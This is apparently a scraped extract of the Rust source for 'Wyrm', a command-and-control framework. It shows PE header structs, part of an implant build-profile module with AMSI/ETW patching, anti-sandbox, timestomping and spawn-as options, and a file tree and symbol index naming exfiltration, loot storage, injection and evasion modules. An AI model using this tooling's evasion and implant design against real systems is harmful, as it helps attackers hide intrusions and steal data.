    pub DataDirectory: [IMAGE_DATA_DIRECTORY; 16],
}

/// Newtype over the raw `u16` `Magic` value of [`IMAGE_OPTIONAL_HEADER64`];
/// `#[repr(transparent)]` keeps it layout-identical to `u16`.
#[repr(transparent)]
#[allow(non_snake_case, non_camel_case_types)]
pub struct IMAGE_OPTIONAL_HEADER_MAGIC(pub u16);

/// Newtype over the raw `u16` `DllCharacteristics` flags of [`IMAGE_OPTIONAL_HEADER64`];
/// `#[repr(transparent)]` keeps it layout-identical to `u16`.
#[repr(transparent)]
#[allow(non_snake_case, non_camel_case_types)]
pub struct IMAGE_DLL_CHARACTERISTICS(pub u16);

/// Newtype over the raw `u16` `Subsystem` value of [`IMAGE_OPTIONAL_HEADER64`];
/// `#[repr(transparent)]` keeps it layout-identical to `u16`.
#[repr(transparent)]
#[allow(non_snake_case, non_camel_case_types)]
pub struct IMAGE_SUBSYSTEM(pub u16);

/// A single PE data-directory entry (`IMAGE_DATA_DIRECTORY`): an RVA plus the size of the
/// table it points at. Sixteen of these terminate [`IMAGE_OPTIONAL_HEADER64`].
#[repr(C)]
#[allow(non_snake_case, non_camel_case_types)]
pub struct IMAGE_DATA_DIRECTORY {
    pub VirtualAddress: u32,
    pub Size: u32,
}

/// PE export directory table (`IMAGE_EXPORT_DIRECTORY`), laid out `#[repr(C)]` to match the
/// on-disk format. The `AddressOf*` fields are RVAs into the image, not file offsets.
#[repr(C)]
#[allow(non_snake_case, non_camel_case_types)]
pub struct IMAGE_EXPORT_DIRECTORY {
    pub Characteristics: u32,
    pub TimeDateStamp: u32,
    pub MajorVersion: u16,
    pub MinorVersion: u16,
    pub Name: u32,
    pub Base: u32,
    pub NumberOfFunctions: u32,
    pub NumberOfNames: u32,
    pub AddressOfFunctions: u32,
    pub AddressOfNames: u32,
    pub AddressOfNameOrdinals: u32,
}


================================================
FILE: c2/src/profiles.rs
================================================
use std::{
    collections::{BTreeMap, HashSet},
    path::{Path, PathBuf},
};

use serde::Deserialize;
use shared::tasks::{Exports, NewAgentStaging, StageType, StringStomp, WyrmResult};
use tokio::io;

use crate::{WOFS_PATH, logging::log_error};

/// Root of a deserialised build profile: server-wide settings plus a named map of implant
/// profiles. A `BTreeMap` keeps implant iteration order deterministic by profile name.
#[derive(Deserialize, Debug, Default, Clone)]
pub struct Profile {
    // Server-level configuration (currently just the token).
    pub server: Server,
    // Implant profiles keyed by their profile name.
    pub implants: BTreeMap<String, Implant>,
}

/// Server-level section of the profile.
#[derive(Deserialize, Debug, Default, Clone)]
pub struct Server {
    // Token string from the profile — presumably used for server auth; verify against callers.
    pub token: String,
}

/// Network section of an implant profile: where and how the implant communicates.
/// `Option` fields are absent-able in the profile file; their defaulting happens elsewhere.
#[derive(Deserialize, Debug, Default, Clone)]
pub struct Network {
    // Address the implant connects to.
    pub address: String,
    // Candidate URI paths for traffic.
    pub uri: Vec<String>,
    pub port: u16,
    // Optional per-implant token override.
    pub token: Option<String>,
    // Optional sleep interval — units not shown here; confirm against consumers.
    pub sleep: Option<u64>,
    // Optional HTTP user-agent string.
    pub useragent: Option<String>,
    // Optional jitter applied to the sleep — units/semantics defined by consumers.
    pub jitter: Option<u64>,
}

/// A single implant profile: build, evasion, and network options for one agent build.
#[derive(Deserialize, Debug, Default, Clone)]
pub struct Implant {
    // Optional anti-sandbox toggles.
    pub anti_sandbox: Option<AntiSandbox>,
    // Whether to produce a debug build; `None` treated as false by `as_staged_agent`.
    pub debug: Option<bool>,
    // Deliberately private (no `pub`): the service name is only accessible within this module.
    svc_name: String,
    pub network: Network,
    pub evasion: Evasion,
    // Exported symbols configuration (shared type from `shared::tasks`).
    pub exports: Exports,
    // Optional string-stomping configuration (shared type from `shared::tasks`).
    pub string_stomp: Option<StringStomp>,
    // Optional mutex name — presumably for single-instance enforcement; confirm in implant code.
    pub mutex: Option<String>,
    // Optional list of WOF directories/entries; validated elsewhere (see `validate_wof_dirs`).
    pub wofs: Option<Vec<String>>,
}

/// Anti-sandbox toggles for an implant build. Both flags are optional in the profile file;
/// the exact checks they enable are implemented in the implant, not visible here.
#[derive(Deserialize, Debug, Default, Clone)]
pub struct AntiSandbox {
    pub trig: Option<bool>,
    pub ram: Option<bool>,
}

/// Evasion options for an implant build; all optional in the profile file.
#[derive(Deserialize, Debug, Default, Clone)]
pub struct Evasion {
    // Patch ETW; `None` treated as false by `as_staged_agent`.
    pub patch_etw: Option<bool>,
    // Patch AMSI; `None` treated as false by `as_staged_agent`.
    pub patch_amsi: Option<bool>,
    // Timestomp datetime string — presumably the `%d/%m/%Y %H:%M:%S` format expected by
    // `timestomp_binary_compile_date`; confirm at the call site.
    pub timestomp: Option<String>,
    // Optional process name/path to spawn as — semantics defined by the consumer.
    pub spawn_as: Option<String>,
}

impl Profile {
    /// Constructs a [`shared::tasks::NewAgentStaging`] from the profile.
    ///
    /// # Args
    /// - `listener_profile_name`: The name in the profile for which listener is selected
    /// - `implant_profile_name`: The name in the profile for which implant profile is selected
    /// - `stage_type`: The [`shared::tasks::StageType`] of binary to build
    pub fn as_staged_agent(
        &self,
        implant_profile_name: &str,
        stage_type: StageType,
    ) -> WyrmResult<NewAgentStaging> {
        //
        // Essentially here we are going to validate the input; and reconstruct the data assuming it is correct.
        // In the event of an error, we want to return a WyrmResult::Err to indicate there was some form of failure.
        //

        let implant = match self.implants.get(implant_profile_name) {
            Some(i) => i,
            None => {
                return WyrmResult::Err(format!(
                    "Could not find implant profile {implant_profile_name}"
                ));
            }
        };

        let build_debug = implant.debug.unwrap_or_default();
        let patch_etw = implant.evasion.patch_etw.unwrap_or_default();
        let patch_amsi = implant.evasion.patch_amsi.unwrap_or_default();

        // Unwrap a sleep time from 
Download .txt
gitextract_j_8agxu3/

├── .dockerignore
├── .gitignore
├── .vscode/
│   └── settings.json
├── CONTRIBUITIONS.md
├── Cargo.toml
├── LICENCE
├── Milestones.md
├── RELEASE_NOTES.md
├── Readme.md
├── c2/
│   ├── Cargo.toml
│   ├── Dockerfile
│   ├── Readme.md
│   ├── migrations/
│   │   ├── 20250614124105_agent_table.sql
│   │   ├── 20250614124140_add_sleep.sql
│   │   ├── 20250614132037_tasks.sql
│   │   ├── 20250615070633_flesh_table.sql
│   │   ├── 20250615072852_add_col_back_tasks.sql
│   │   ├── 20250615085223_add_uid.sql
│   │   ├── 20250615085245_add_uid.sql
│   │   ├── 20250615211204_rm_col_from_tasks.sql
│   │   ├── 20250616171233_ch_col.sql
│   │   ├── 20250619055731_results_table.sql
│   │   ├── 20250621175632_add_time.sql
│   │   ├── 20250621180355_add_time.sql
│   │   ├── 20250622075242_agent_staging.sql
│   │   ├── 20250622080004_protect_staging.sql
│   │   ├── 20250622080748_remove_constraint.sql
│   │   ├── 20250622083052_add_col_staging.sql
│   │   ├── 20250622094131_add_col_staging_again.sql
│   │   ├── 20250622094232_del_col_agent.sql
│   │   ├── 20250622122051_protect_pe_name.sql
│   │   ├── 20250622130349_port_to_agent_staging.sql
│   │   ├── 20250622154423_operator_table.sql
│   │   ├── 20250622161952_db_add_cstr.sql
│   │   ├── 20250624164511_col_for_toks.sql
│   │   ├── 20250627184526_default_env.sql
│   │   ├── 20250712164452_update_field_for_sleep.sql
│   │   ├── 20250712164815_update_field_for_prt.sql
│   │   ├── 20250712165040_update_field_for_prt_again.sql
│   │   ├── 20250719090503_rm_constraint_upload.sql
│   │   ├── 20250727101559_xor_payload.sql
│   │   ├── 20251025085314_update_time_completed_field.sql
│   │   ├── 20251026120715_change_dt_field.sql
│   │   ├── 20251026121136_change_dt_field_2.sql
│   │   ├── 20251026122000_time_comp_rm.sql
│   │   ├── 20251026144632_add_agent_id_to_ct.sql
│   │   ├── 20251119185937_add_pulled_col.sql
│   │   ├── 20251127184944_download_col.sql
│   │   ├── 20251127193415_make_bigint.sql
│   │   ├── 20251207091938_beacon_console_line.sql
│   │   ├── 20251207092341_testagent.sql
│   │   ├── 20251215120000_completed_tasks_pending_idx.sql
│   │   └── 20251215123000_tasks_fetched_default.sql
│   └── src/
│       ├── admin_task_dispatch/
│       │   ├── dispatch_table.rs
│       │   ├── execute.rs
│       │   ├── implant_builder.rs
│       │   └── mod.rs
│       ├── agents.rs
│       ├── api/
│       │   ├── admin_routes.rs
│       │   ├── agent_get.rs
│       │   ├── agent_post.rs
│       │   └── mod.rs
│       ├── app_state.rs
│       ├── db.rs
│       ├── exfil.rs
│       ├── logging.rs
│       ├── main.rs
│       ├── middleware.rs
│       ├── net.rs
│       ├── pe_utils/
│       │   ├── mod.rs
│       │   └── types.rs
│       └── profiles.rs
├── client/
│   ├── Caddyfile
│   ├── Cargo.toml
│   ├── Dockerfile
│   ├── index.html
│   ├── src/
│   │   ├── controller/
│   │   │   ├── build_profiles.rs
│   │   │   ├── dashboard.rs
│   │   │   └── mod.rs
│   │   ├── main.rs
│   │   ├── models/
│   │   │   ├── dashboard.rs
│   │   │   └── mod.rs
│   │   ├── net.rs
│   │   ├── pages/
│   │   │   ├── build_profiles.rs
│   │   │   ├── dashboard.rs
│   │   │   ├── file_upload.rs
│   │   │   ├── logged_in_headers.rs
│   │   │   ├── login.rs
│   │   │   ├── logout.rs
│   │   │   ├── mod.rs
│   │   │   └── staged_resources.rs
│   │   └── tasks/
│   │       ├── mod.rs
│   │       ├── task_dispatch.rs
│   │       ├── task_impl.rs
│   │       └── utils.rs
│   └── static/
│       ├── main_styles.css
│       └── styles.css
├── docker-compose.yml
├── implant/
│   ├── .cargo/
│   │   └── config.toml
│   ├── Cargo.toml
│   ├── Readme.md
│   ├── build.rs
│   ├── rust-toolchain.toml
│   ├── set_dbg_env.ps1
│   └── src/
│       ├── anti_sandbox/
│       │   ├── memory.rs
│       │   ├── mod.rs
│       │   └── trig.rs
│       ├── comms.rs
│       ├── entry.rs
│       ├── evasion/
│       │   ├── amsi.rs
│       │   ├── etw.rs
│       │   ├── mod.rs
│       │   └── veh.rs
│       ├── execute/
│       │   ├── dotnet.rs
│       │   ├── ffi.rs
│       │   └── mod.rs
│       ├── lib.rs
│       ├── main.rs
│       ├── main_svc.rs
│       ├── native/
│       │   ├── Readme.md
│       │   ├── accounts.rs
│       │   ├── filesystem.rs
│       │   ├── mod.rs
│       │   ├── processes.rs
│       │   ├── registry.rs
│       │   └── shell.rs
│       ├── spawn_inject/
│       │   ├── early_cascade.rs
│       │   ├── injection.rs
│       │   └── mod.rs
│       ├── stubs/
│       │   ├── mod.rs
│       │   ├── rdi.rs
│       │   └── shim.rs
│       ├── utils/
│       │   ├── allocate.rs
│       │   ├── comptime.rs
│       │   ├── console.rs
│       │   ├── export_comptime.rs
│       │   ├── mod.rs
│       │   ├── pe_stomp.rs
│       │   ├── proxy.rs
│       │   ├── strings.rs
│       │   ├── svc_controls.rs
│       │   └── time_utils.rs
│       ├── wofs/
│       │   └── mod.rs
│       └── wyrm.rs
├── loader/
│   ├── .cargo/
│   │   └── config.toml
│   ├── Cargo.toml
│   ├── build.rs
│   └── src/
│       ├── export_comptime.rs
│       ├── injector.rs
│       ├── lib.rs
│       ├── main.rs
│       ├── main_svc.rs
│       └── utils.rs
├── nginx/
│   └── nginx.conf
├── resources/
│   ├── .$wyrm_staging.drawio.bkp
│   └── wyrm.excalidraw
├── shared/
│   ├── Cargo.toml
│   ├── readme.md
│   └── src/
│       ├── lib.rs
│       ├── net.rs
│       ├── stomped_structs.rs
│       ├── task_types.rs
│       └── tasks.rs
├── shared_c2_client/
│   ├── Cargo.toml
│   ├── readme.md
│   └── src/
│       └── lib.rs
├── shared_no_std/
│   ├── Cargo.toml
│   └── src/
│       ├── export_resolver.rs
│       ├── lib.rs
│       └── memory.rs
└── wofs_static/
    └── Readme.md
Download .txt
SYMBOL INDEX (627 symbols across 94 files)

FILE: c2/migrations/20250614124105_agent_table.sql
  type agents (line 2) | CREATE TABLE agents (

FILE: c2/migrations/20250614132037_tasks.sql
  type tasks (line 2) | CREATE TABLE tasks (

FILE: c2/migrations/20250615070633_flesh_table.sql
  type idx_tasks_incomplete (line 10) | CREATE INDEX idx_tasks_incomplete

FILE: c2/migrations/20250616171233_ch_col.sql
  type idx_tasks_incomplete (line 30) | CREATE INDEX idx_tasks_incomplete

FILE: c2/migrations/20250619055731_results_table.sql
  type completed_tasks (line 2) | CREATE TABLE completed_tasks (

FILE: c2/migrations/20250622075242_agent_staging.sql
  type agent_staging (line 2) | CREATE TABLE agent_staging (

FILE: c2/migrations/20250622154423_operator_table.sql
  type operators (line 2) | CREATE TABLE operators (

FILE: c2/migrations/20251215120000_completed_tasks_pending_idx.sql
  type idx_completed_tasks_agent_pending (line 2) | CREATE INDEX IF NOT EXISTS idx_completed_tasks_agent_pending

FILE: c2/src/admin_task_dispatch/dispatch_table.rs
  function admin_dispatch (line 21) | pub async fn admin_dispatch(

FILE: c2/src/admin_task_dispatch/execute.rs
  function dotex (line 15) | pub async fn dotex(
  type InternalName (line 41) | type InternalName = String;
  type SpawnInject (line 44) | pub enum SpawnInject {
  function spawn_inject_with_network_resource (line 50) | pub async fn spawn_inject_with_network_resource(

FILE: c2/src/admin_task_dispatch/implant_builder.rs
  constant FULLY_QUAL_PATH_TO_FILE_BUILD (line 28) | const FULLY_QUAL_PATH_TO_FILE_BUILD: &str = "/app/profiles/tmp";
  function build_all_bins (line 33) | pub async fn build_all_bins(
  function write_loader_to_tmp (line 114) | async fn write_loader_to_tmp(
  function compile_loader (line 215) | async fn compile_loader(
  function compile_agent (line 293) | pub async fn compile_agent(
  function post_process_pe_on_disk (line 421) | pub async fn post_process_pe_on_disk(dest: &Path, data: &NewAgentStaging...
  function write_implant_to_tmp_folder (line 473) | pub async fn write_implant_to_tmp_folder<'a>(
  function validate_extension (line 617) | fn validate_extension(name: &String, expected_type: StageType) -> String {
  function stage_new_agent_error_printer (line 657) | async fn stage_new_agent_error_printer(
  function stage_file_upload_from_users_disk (line 672) | pub async fn stage_file_upload_from_users_disk(

FILE: c2/src/admin_task_dispatch/mod.rs
  function remove_dir (line 24) | async fn remove_dir(save_path: impl AsRef<Path>) -> Result<(), String> {
  function remove_file (line 34) | async fn remove_file(file_path: impl AsRef<Path>) -> Result<(), String> {
  function list_agents (line 44) | async fn list_agents(state: State<Arc<AppState>>) -> Option<Value> {
  function task_agent (line 70) | async fn task_agent<T: Into<String>>(
  function task_agent_sleep (line 89) | async fn task_agent_sleep(time: i64, uid: String, state: State<Arc<AppSt...
  function pull_notifications_for_agent (line 108) | async fn pull_notifications_for_agent(uid: String, state: State<Arc<AppS...
  function show_server_time (line 141) | fn show_server_time() -> Option<Value> {
  function list_staged_resources (line 155) | async fn list_staged_resources(state: State<Arc<AppState>>) -> Option<Va...
  function delete_staged_resources (line 170) | async fn delete_staged_resources(
  function remove_agent_from_list (line 197) | async fn remove_agent_from_list(state: State<Arc<AppState>>, agent_name:...
  type StageError (line 205) | enum StageError {
  function add_api_endpoint_for_staged_resource (line 222) | async fn add_api_endpoint_for_staged_resource(
  function is_download_staging_url_error (line 241) | async fn is_download_staging_url_error(
  function drop_file_handler (line 278) | async fn drop_file_handler(
  function export_completed_tasks_to_json (line 321) | async fn export_completed_tasks_to_json(uid: String, state: State<Arc<Ap...

FILE: c2/src/agents.rs
  type Agent (line 12) | pub struct Agent {
    method from_first_run_data (line 23) | async fn from_first_run_data(
    method get_config_data (line 46) | pub fn get_config_data(&self) -> Vec<Task> {
  type AgentHandle (line 63) | type AgentHandle = Arc<RwLock<Agent>>;
  type AgentList (line 67) | pub struct AgentList {
    method default (line 73) | pub fn default() -> Self {
    method snapshot_handles (line 79) | async fn snapshot_handles(&self) -> Vec<AgentHandle> {
    method snapshot_agents (line 84) | pub async fn snapshot_agents(&self) -> Vec<Agent> {
    method mark_agents_stale (line 98) | pub async fn mark_agents_stale(&self) {
    method get_agent_and_tasks_by_header (line 121) | pub async fn get_agent_and_tasks_by_header(
    method contains_agent_by_id (line 225) | pub async fn contains_agent_by_id(&self, id: &str) -> bool {
    method remove_agent (line 230) | pub async fn remove_agent(&self, id: &str) {
  function extract_agent_id (line 241) | pub fn extract_agent_id(headers: &HeaderMap) -> Result<String, String> {
  function handle_kill_command (line 256) | pub async fn handle_kill_command(
  function calculate_max_time_till_stale (line 279) | async fn calculate_max_time_till_stale(sleep: u64) -> i64 {

FILE: c2/src/api/admin_routes.rs
  function handle_admin_commands_on_agent (line 28) | pub async fn handle_admin_commands_on_agent(
  function handle_admin_commands_without_agent (line 38) | pub async fn handle_admin_commands_without_agent(
  function poll_agent_notifications (line 47) | pub async fn poll_agent_notifications(
  function build_all_binaries_handler (line 66) | pub async fn build_all_binaries_handler(
  function admin_login (line 103) | pub async fn admin_login(
  function is_adm_logged_in (line 189) | pub async fn is_adm_logged_in() -> Response {
  function logout (line 193) | pub async fn logout() -> Response {
  function admin_upload (line 197) | pub async fn admin_upload(

FILE: c2/src/api/agent_get.rs
  function handle_agent_get (line 19) | pub async fn handle_agent_get(state: State<Arc<AppState>>, request: Requ...
  function handle_agent_get_with_path (line 42) | pub async fn handle_agent_get_with_path(

FILE: c2/src/api/agent_post.rs
  function agent_post_handler_with_path (line 25) | pub async fn agent_post_handler_with_path(
  function agent_post_handler (line 59) | pub async fn agent_post_handler(
  function handle_agent_post_standard (line 85) | async fn handle_agent_post_standard(
  function receive_exfil (line 208) | async fn receive_exfil(mut mp: Multipart) -> Result<StatusCode, StatusCo...
  function is_multipart (line 250) | fn is_multipart(headers: &HeaderMap) -> bool {

FILE: c2/src/app_state.rs
  type AppState (line 23) | pub struct AppState {
    method from (line 106) | pub async fn from(db_pool: Db, profile: Profile) -> Self {
    method track_sessions (line 135) | pub fn track_sessions(&self) {
    method create_session_key (line 150) | pub async fn create_session_key(&self) -> String {
    method has_session (line 172) | pub async fn has_session(&self, key: &str) -> bool {
    method remove_session (line 182) | pub async fn remove_session(&self, key: &str) {
  type DownloadEndpointData (line 36) | pub struct DownloadEndpointData {
    method new (line 43) | pub fn new(file_name: &str, internal_name: &str, xor_key: Option<u8>) ...
  type Endpoints (line 53) | pub struct Endpoints {
    method find_format_download_endpoint (line 67) | pub fn find_format_download_endpoint(&self, needle: &str) -> Option<St...
    method read_staged_file_by_file_name (line 78) | pub async fn read_staged_file_by_file_name(&self, needle: &str) -> Res...
  function detect_stale_agents (line 195) | pub async fn detect_stale_agents(state: Arc<AppState>) {

FILE: c2/src/db.rs
  constant MAX_DB_CONNECTIONS (line 20) | const MAX_DB_CONNECTIONS: u32 = 30;
  constant DB_ACQUIRE_TIMEOUT_SECS (line 21) | const DB_ACQUIRE_TIMEOUT_SECS: u64 = 3;
  constant DB_STATEMENT_TIMEOUT_MS (line 22) | const DB_STATEMENT_TIMEOUT_MS: u64 = 30_000;
  type Db (line 25) | pub struct Db {
    method new (line 31) | pub async fn new() -> Self {
    method get_agent_with_tasks_by_id (line 75) | pub async fn get_agent_with_tasks_by_id(
    method get_tasks_for_agent_by_uid (line 113) | pub async fn get_tasks_for_agent_by_uid(
    method insert_new_agent (line 171) | pub async fn insert_new_agent(
    method add_task_for_agent_by_id (line 198) | pub async fn add_task_for_agent_by_id(
    method update_agent_sleep_time (line 221) | pub async fn update_agent_sleep_time(
    method mark_task_completed (line 240) | pub async fn mark_task_completed(&self, task: &Task) -> Result<(), sql...
    method add_completed_task (line 257) | pub async fn add_completed_task(&self, task: &Task, agent_id: &str) ->...
    method agent_has_pending_notifications (line 279) | pub async fn agent_has_pending_notifications(&self, uid: &String) -> R...
    method pull_notifications_for_agent (line 306) | pub async fn pull_notifications_for_agent(
    method update_agent_checkin_time (line 349) | pub async fn update_agent_checkin_time(&self, agent: &mut Agent) -> Re...
    method add_staged_agent (line 385) | pub async fn add_staged_agent(&self, data: &NewAgentStaging) -> Result...
    method delete_staged_resource_by_uri (line 415) | pub async fn delete_staged_resource_by_uri(
    method get_agent_related_db_cfg (line 452) | pub async fn get_agent_related_db_cfg(
    method lookup_operator (line 509) | pub async fn lookup_operator(
    method add_operator (line 532) | pub async fn add_operator(
    method get_staged_agent_data (line 560) | pub async fn get_staged_agent_data(&self) -> Result<Vec<StagedResource...
    method get_agent_export_data (line 572) | pub async fn get_agent_export_data(&self, uid: &str) -> Result<Option<...
    method update_download_count (line 608) | pub async fn update_download_count(&self, staged_endpoint: &String) ->...

FILE: c2/src/exfil.rs
  function handle_exfiltrated_file (line 10) | pub async fn handle_exfiltrated_file(task: &mut Task) {
  function handle_exfiltrated_file_stream (line 92) | pub async fn handle_exfiltrated_file_stream(task: &mut Task) {

FILE: c2/src/logging.rs
  function log_download_accessed (line 8) | pub async fn log_download_accessed(uri: &str, addr: &str) {
  function log_page_accessed_no_auth (line 17) | pub async fn log_page_accessed_no_auth(uri: &str, addr: &str) {
  function log_page_accessed_auth (line 32) | pub async fn log_page_accessed_auth(uri: &str, addr: &str) {
  function log_admin_login_attempt (line 47) | pub async fn log_admin_login_attempt(username: &str, password: &str, ip:...
  function log_error (line 80) | pub fn log_error(message: &str) {
  function log_error_async (line 87) | pub async fn log_error_async(message: &str) {
  function log (line 98) | async fn log(path: &PathBuf, message: &str, addr: Option<&str>) {
  function log_sync (line 112) | fn log_sync(path: &PathBuf, message: &str, addr: Option<&str>) {
  function construct_msg (line 125) | fn construct_msg(ip: Option<&str>, message: &str) -> String {
  function print_success (line 166) | pub fn print_success(msg: impl Display) {
  function print_info (line 170) | pub fn print_info(msg: impl Display) {
  function print_failed (line 174) | pub fn print_failed(msg: impl Display) {

FILE: c2/src/main.rs
  constant NUM_GIGS (line 54) | const NUM_GIGS: usize = 100;
  constant MAX_POST_BODY_SZ (line 55) | const MAX_POST_BODY_SZ: usize = NUM_GIGS * 1024 * 1024 * 1024;
  constant AUTH_COOKIE_NAME (line 57) | const AUTH_COOKIE_NAME: &str = "session";
  constant COOKIE_TTL (line 58) | const COOKIE_TTL: Duration = Duration::from_hours(12);
  constant FILE_STORE_PATH (line 62) | const FILE_STORE_PATH: &str = "/data/staged_files";
  constant EXFIL_PATH (line 63) | const EXFIL_PATH: &str = "/data/loot";
  constant LOG_PATH (line 64) | const LOG_PATH: &str = "/data/logs";
  constant DB_EXPORT_PATH (line 65) | const DB_EXPORT_PATH: &str = "/data/exports";
  constant ACCESS_LOG (line 66) | const ACCESS_LOG: &str = "access.log";
  constant DOWNLOAD (line 67) | const DOWNLOAD: &str = "downloads.log";
  constant LOGIN_LOG (line 68) | const LOGIN_LOG: &str = "login.log";
  constant ERROR_LOG (line 69) | const ERROR_LOG: &str = "error.log";
  constant TOOLS_PATH (line 70) | const TOOLS_PATH: &str = "/tools";
  constant WOFS_PATH (line 71) | const WOFS_PATH: &str = "/wofs_static";
  function main (line 74) | async fn main() -> Result<(), Box<dyn std::error::Error>> {
  function construct_listener_addr (line 102) | fn construct_listener_addr() -> String {
  function init_server_state (line 112) | async fn init_server_state() -> Arc<AppState> {
  function build_routes (line 139) | fn build_routes(state: Arc<AppState>) -> Router {
  function ensure_dirs_and_files (line 226) | fn ensure_dirs_and_files() {
  function handle_panic (line 240) | fn handle_panic(err: Box<dyn Any + Send + 'static>) -> Response<Full<Byt...

FILE: c2/src/middleware.rs
  constant BCRYPT_HASH_BYTES (line 20) | const BCRYPT_HASH_BYTES: usize = 24;
  constant BCRYPT_COST (line 21) | const BCRYPT_COST: u32 = 12;
  constant SALT_BYTES (line 22) | const SALT_BYTES: usize = 16;
  constant LOCK_WAIT_WARN_MS (line 23) | const LOCK_WAIT_WARN_MS: u128 = 500;
  function authenticate_admin (line 31) | pub async fn authenticate_admin(
  function verify_password (line 56) | pub async fn verify_password(password: &str, password_hash: &str, salt: ...
  function create_new_operator (line 83) | pub async fn create_new_operator(username: &str, password: &str, state: ...
  function authenticate_agent_by_header_token (line 123) | pub async fn authenticate_agent_by_header_token(
  function logout_middleware (line 206) | pub async fn logout_middleware(

FILE: c2/src/net.rs
  function serialise_tasks_for_agent (line 27) | pub async fn serialise_tasks_for_agent(tasks: Option<Vec<Task>>) -> Vec<...
  function prepare_response_packet (line 54) | async fn prepare_response_packet(task: Task) -> Vec<u8> {
  function from_task_id_bytes (line 80) | fn from_task_id_bytes(id: i32) -> Vec<u16> {
  function serve_file (line 90) | pub async fn serve_file(filename: &String, xor_key: Option<u8>) -> Respo...

FILE: c2/src/pe_utils/mod.rs
  type PeScrubError (line 18) | pub enum PeScrubError {
  function timestomp_binary_compile_date (line 46) | pub async fn timestomp_binary_compile_date(
  function str_to_epoch (line 106) | fn str_to_epoch(dt_str: &str) -> Result<u32, PeScrubError> {
  function scrub_strings (line 123) | pub async fn scrub_strings(
  function commit_files (line 181) | async fn commit_files(file: &mut File, buf: &mut Vec<u8>) -> Result<(), ...

FILE: c2/src/pe_utils/types.rs
  type IMAGE_FILE_HEADER (line 3) | pub struct IMAGE_FILE_HEADER {
  type IMAGE_FILE_MACHINE (line 15) | pub struct IMAGE_FILE_MACHINE(pub u16);
  type IMAGE_FILE_CHARACTERISTICS (line 19) | pub struct IMAGE_FILE_CHARACTERISTICS(pub u16);
  type IMAGE_NT_HEADERS64 (line 23) | pub struct IMAGE_NT_HEADERS64 {
  type IMAGE_DOS_HEADER (line 31) | pub struct IMAGE_DOS_HEADER {
  type IMAGE_OPTIONAL_HEADER64 (line 55) | pub struct IMAGE_OPTIONAL_HEADER64 {
  type IMAGE_OPTIONAL_HEADER_MAGIC (line 90) | pub struct IMAGE_OPTIONAL_HEADER_MAGIC(pub u16);
  type IMAGE_DLL_CHARACTERISTICS (line 94) | pub struct IMAGE_DLL_CHARACTERISTICS(pub u16);
  type IMAGE_SUBSYSTEM (line 98) | pub struct IMAGE_SUBSYSTEM(pub u16);
  type IMAGE_DATA_DIRECTORY (line 102) | pub struct IMAGE_DATA_DIRECTORY {
  type IMAGE_EXPORT_DIRECTORY (line 109) | pub struct IMAGE_EXPORT_DIRECTORY {

FILE: c2/src/profiles.rs
  type Profile (line 13) | pub struct Profile {
    method as_staged_agent (line 68) | pub fn as_staged_agent(
  type Server (line 19) | pub struct Server {
  type Network (line 24) | pub struct Network {
  type Implant (line 35) | pub struct Implant {
  type AntiSandbox (line 48) | pub struct AntiSandbox {
  type Evasion (line 54) | pub struct Evasion {
  function parse_profile (line 178) | pub async fn parse_profile() -> io::Result<Profile> {
  function add_listeners_from_profiles (line 229) | pub fn add_listeners_from_profiles(existing: &mut HashSet<String>, p: &P...
  function add_tokens_from_profiles (line 244) | pub fn add_tokens_from_profiles(existing: &mut HashSet<String>, p: &Prof...
  function read_profile (line 255) | async fn read_profile(path: &Path) -> io::Result<Profile> {
  type ParsedExportStrings (line 280) | pub struct ParsedExportStrings {
    method empty (line 287) | fn empty() -> Self {
    method from (line 295) | fn from(plain_only: String, machine_code: String, export_proxy: String...
  function parse_exports_to_string_for_env (line 306) | pub fn parse_exports_to_string_for_env(exports: &Exports) -> ParsedExpor...
  function validate_wof_dirs (line 343) | fn validate_wof_dirs(wofs: &Vec<String>) -> Result<(), String> {

FILE: client/src/controller/build_profiles.rs
  function trigger_download (line 13) | pub fn trigger_download(filename: &str, bytes: &[u8]) {

FILE: client/src/controller/dashboard.rs
  function update_connected_agents (line 19) | pub fn update_connected_agents(

FILE: client/src/controller/mod.rs
  type BodyClass (line 11) | pub enum BodyClass {
  function wyrm_chat_history_browser_key (line 17) | pub fn wyrm_chat_history_browser_key(uid: &str) -> String {
  function apply_body_class (line 25) | pub fn apply_body_class(target: BodyClass) {
  function is_logged_in (line 40) | pub async fn is_logged_in() -> bool {
  function get_item_from_browser_store (line 45) | pub fn get_item_from_browser_store<T>(key: &str) -> anyhow::Result<T>
  function store_item_in_browser_store (line 68) | pub fn store_item_in_browser_store<T: Serialize>(key: &str, item: &T) ->...
  function delete_item_in_browser_store (line 84) | pub fn delete_item_in_browser_store(key: &str) {

FILE: client/src/main.rs
  function main (line 16) | fn main() {
  function App (line 24) | fn App() -> impl IntoView {

FILE: client/src/models/dashboard.rs
  type AgentC2MemoryNotifications (line 27) | pub type AgentC2MemoryNotifications = (String, bool, Option<Value>);
  type Agent (line 32) | pub struct Agent {
    method from (line 45) | pub fn from(
    method from_messages (line 63) | pub fn from_messages(
  type TabConsoleMessages (line 86) | pub struct TabConsoleMessages {
    method non_agent_message (line 99) | pub fn non_agent_message(event: String, message: String) -> Self {
    method from (line 122) | fn from(notification_data: NotificationForAgent) -> Self {
  type NotificationForAgent (line 112) | pub struct NotificationForAgent {
  function command_to_string (line 151) | fn command_to_string(cmd: &Command) -> String {
  type FormatOutput (line 186) | pub trait FormatOutput {
    method format_console_output (line 187) | fn format_console_output(&self) -> Vec<String>;
    method format_console_output (line 191) | fn format_console_output(&self) -> Vec<String> {
  function print_client_error (line 570) | fn print_client_error(msg: &str) -> String {
  type StripCannon (line 574) | trait StripCannon {
    method try_strip_prefix (line 575) | fn try_strip_prefix(&self) -> String;
    method try_strip_prefix (line 583) | fn try_strip_prefix(&self) -> String {
  function print_wyrm_result_string (line 595) | fn print_wyrm_result_string(encoded_data: &String) -> Vec<String> {
  type ActiveTabs (line 614) | pub struct ActiveTabs {
    method from_store (line 622) | pub fn from_store() -> Self {
    method save_to_store (line 627) | pub fn save_to_store(&self) -> anyhow::Result<()> {
    method add_tab (line 634) | pub fn add_tab(&mut self, name: &str) {
    method remove_tab (line 642) | pub fn remove_tab(&mut self, name: &str) {
  type AgentIdSplit (line 654) | pub enum AgentIdSplit {
  function get_info_from_agent_id (line 661) | pub fn get_info_from_agent_id<'a>(haystack: &'a str, needle: AgentIdSpli...
  function get_agent_tab_name (line 681) | pub fn get_agent_tab_name(haystack: &str) -> Option<String> {
  function resolve_tab_to_agent_id (line 699) | pub fn resolve_tab_to_agent_id(

FILE: client/src/models/mod.rs
  type LoginData (line 6) | pub struct LoginData {
